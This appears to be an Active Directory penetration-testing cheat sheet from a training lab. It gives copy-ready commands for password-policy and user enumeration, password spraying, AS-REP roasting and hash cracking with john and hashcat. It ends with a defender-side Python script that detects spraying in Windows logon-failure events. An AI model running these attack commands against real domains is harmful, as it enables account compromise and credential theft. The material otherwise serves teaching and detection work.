With Username

Get the password policy
cme smb <ip> -u "user" -p "password" --pass-pol
enum4linux -u "user" -p "password" -P <ip>
rpcclient -U "" -N <ip>
rpcclient $> getdompwinfo
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
Import-Module .\PowerView.ps1
Get-DomainPolicy
net accounts

Making a Target User List
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
rpcclient -U "" -N 172.16.5.5
cme smb 172.16.5.5 --users
sudo cme smb 172.16.5.5 -u user -p password --users
ldapsearch -h 172.16.5.5 -x -b "DC=domain,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip <ip> -u "" -U
kerbrute userenum -d <domain> --dc <ip> wordlist.txt

Password Spraying
sudo cme smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
kerbrute passwordspray -d <domain> --dc <dc-ip> valid_users.txt Password
sprayhound -U <users.txt> -d <domain> -dc <dc-ip>
for u in $(cat valid_users.txt); do rpcclient -U "$u%<password>" -c "getusername;quit" <dc-ip> | grep Authority; done
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Password -OutFile spray_success -ErrorAction SilentlyContinue
.\Spray-Passwords.ps1 -Pass <PASSWORD> -Admin

ASREPRoast
Identify vulnerable accounts with the "Do not require preauthentication" option enabled.
Kerbrute
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

PowerView
Get-DomainUser -PreauthNotRequired -Properties SamAccountName

Exploit AS-REP Roasting to extract password hashes.

Rubeus.exe
.\Rubeus.exe asreproast /user:username /format:hashcat /outfile:hash.txt

GetNPUsers
impacket-GetNPUsers -dc-ip <ip> -request -outputfile <file_name> <domain/user>
GetNPUsers.py domain/ -usersfile users.txt -dc-ip <ip> -format hashcat -request

Crack hashes for plaintext passwords. If we found a hash and want to crack it:

john
.\john.exe hash.txt --format=krb5asrep -wordlist=wordlist

hashcat
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
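As an added defender-side example (not part of the original cheat sheet), the Python script below flags the pattern that the Password Spraying section leaves in Windows Security logs: one source failing against many distinct accounts while keeping each account under the lockout threshold that the password-policy commands (net accounts, Get-DomainPolicy) expose. The event IDs, addresses and usernames in SAMPLE_EVENTS are constructed, and the default lockout_threshold of 5 is an assumption to be replaced by the real policy value.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events shaped like Security log entries: event 4625 (logon
# failure) and 4771 (Kerberos pre-auth failure), as (timestamp, id, source, user).
# 10.0.0.50 tries six accounts once each (spray); 10.0.0.77 is one user retyping.
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01", 4625, "10.0.0.50", "asmith"),
    ("2024-05-01T09:00:02", 4625, "10.0.0.50", "bjones"),
    ("2024-05-01T09:00:03", 4771, "10.0.0.50", "cdavis"),
    ("2024-05-01T09:00:04", 4625, "10.0.0.50", "dlee"),
    ("2024-05-01T09:00:05", 4625, "10.0.0.50", "ekhan"),
    ("2024-05-01T09:00:06", 4771, "10.0.0.50", "fwong"),
    ("2024-05-01T09:03:00", 4625, "10.0.0.77", "cdavis"),
    ("2024-05-01T09:03:30", 4625, "10.0.0.77", "cdavis"),
]


def detect_spray(events, window=timedelta(minutes=10), min_users=5, lockout_threshold=5):
    """Return {source: sorted distinct users} for every source that failed against
    at least min_users distinct accounts inside one window while keeping every
    account below lockout_threshold attempts (the spray signature: wide, not deep).
    lockout_threshold is an assumed value; take it from the domain password policy."""
    by_source = defaultdict(list)
    for ts, event_id, src, user in events:
        if event_id in (4625, 4771):          # only authentication failures
            by_source[src].append((datetime.fromisoformat(ts), user))

    hits = {}
    for src, attempts in by_source.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            # sliding window anchored at each failed attempt
            per_user = defaultdict(int)
            for t, u in attempts[i:]:
                if t - start > window:
                    break
                per_user[u] += 1
            if len(per_user) >= min_users and max(per_user.values()) < lockout_threshold:
                hits[src] = sorted(per_user)
                break
    return hits


if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {src}: {len(users)} accounts -> {users}")
```

Feeding real 4625/4771 records into detect_spray with the domain's actual lockout threshold turns the cheat sheet's spraying step into an alert condition.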